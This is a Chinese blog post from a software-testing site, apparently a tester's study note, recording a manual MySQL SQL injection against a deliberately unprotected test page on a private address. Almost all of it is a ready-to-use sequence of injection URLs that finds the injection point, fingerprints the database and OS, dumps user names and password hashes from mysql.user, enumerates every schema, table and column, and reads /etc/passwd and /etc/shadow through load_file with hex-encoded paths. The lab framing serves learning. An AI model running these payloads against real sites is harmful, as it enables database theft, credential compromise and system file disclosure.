空间管理您的位置: 51Testing软件测试网 » redforce的个人空间 » 日志

本空间内容都是自己的随记，转载请注明出处！

手工注入mysql笔记

上一篇 / 下一篇 2012-11-30 10:47:34 / 个人分类：安全类

查看( 1002 ) / 评论( 0 ) / 评分( 0 / 0 )

让开发同事帮忙写了个页面，没有防止sql注入的。用来学习手工sql注入用到的一些函数和方法，其实就是个验证并记录的过程

http://192.168.0.226/inputTest/info.jsp?userid=1

1、判断是否存在注入点

http://192.168.0.226/inputTest/info.jsp?userid=1and 1=1 正常执行，页面有结果

http://192.168.0.226/inputTest/info.jsp?userid=1and 1=2 页面没有结果

http://192.168.0.226/inputTest/info.jsp?userid=1and 页面异常，从异常信息可以看出是mysql数据库

2、判断数据库类型

http://192.168.0.226/inputTest/info.jsp?userid=1union select 0,@@version

http://192.168.0.226/inputTest/info.jsp?userid=1union select 0,version()

3、判断字段数量

http://192.168.0.226/inputTest/info.jsp?userid=1order by 9 页面异常，可以看出没有字段9，继续减小数字

http://192.168.0.226/inputTest/info.jsp?userid=1order by 2 页面正常输出，说明有2个字段

http://192.168.0.226/inputTest/info.jsp?userid=1union select 1,2 页面正常输出

4、查询当前数据库名称

http://192.168.0.226/inputTest/info.jsp?userid=1union select 1,2,database() 页面异常，因为只有2个字段

http://192.168.0.226/inputTest/info.jsp?userid=1union select 1,database() 正常输出，最后的显示是数据库名（test）

http://192.168.0.226/inputTest/info.jsp?userid=1union select 1,concat(database()) 正常输出，最后的显示是数据库名

5、查服务器操作系统

http://192.168.0.226/inputTest/info.jsp?userid=1union select 1,@@version_compile_os

http://192.168.0.226/inputTest/info.jsp?userid=1union all select 1,@@global.version_compile_os from mysql.user

6、查询数据库版本和用户

查询版本可用version() 或者@@version

查询用户可用user()或System_user()或Session_user()或Current_user()

http://192.168.0.226/inputTest/info.jsp?userid=1union all select user(),version()

7、查询数据库路径

http://192.168.0.226/inputTest/info.jsp?userid=1union all select 1，@@basedir

•@@basedirMySQL安装基准目录
•@@datadir数据库存储的地方

8、查用户和密码

http://192.168.0.226/inputTest/info.jsp?userid=1union select 0,group_concat(user,0x3a,password) from mysql.user

0x3a：分割作用

9、查询所有库名和表名

http://192.168.0.226/inputTest/info.jsp?userid=1union select 0,group_concat(table_schema,0x3a,table_name) from information_schema.tables

详细情况请查看information_schema库

10、查看当前库的所有表名

http://192.168.0.226/inputTest/info.jsp?userid=1union select 0, group_concat(table_name) from information_schema.tables where table_schema='test'

11、查看表的字段名

http://192.168.0.226/inputTest/info.jsp?userid=1union select 0, group_concat(column_name) from information_schema.columns where table_name='usertest'

到此为止，数据库基本搞定，根据库，表，字段可以查询出管理后台或者用户的用户名和密码。

12、读系统文件

http://192.168.0.226/inputTest/info.jsp?userid=1union select 0, load_file(0x2F6574632F706173737764)

•0x633a5c626f6f742e696e69 c:\boot.ini
•0x2F6574632F706173737764 /etc/passwd
•0x2F6574632F736861646F77 /etc/shadow

用户菜单

我的栏目

标题搜索

日历

数据统计

访问量: 14612
日志数: 15
图片数: 1
文件数: 1
建立时间: 2007-04-24
更新时间: 2014-02-13

手工注入mysql笔记

相关阅读:

用户菜单

我的栏目

标题搜索

日历

我的存档

数据统计

RSS订阅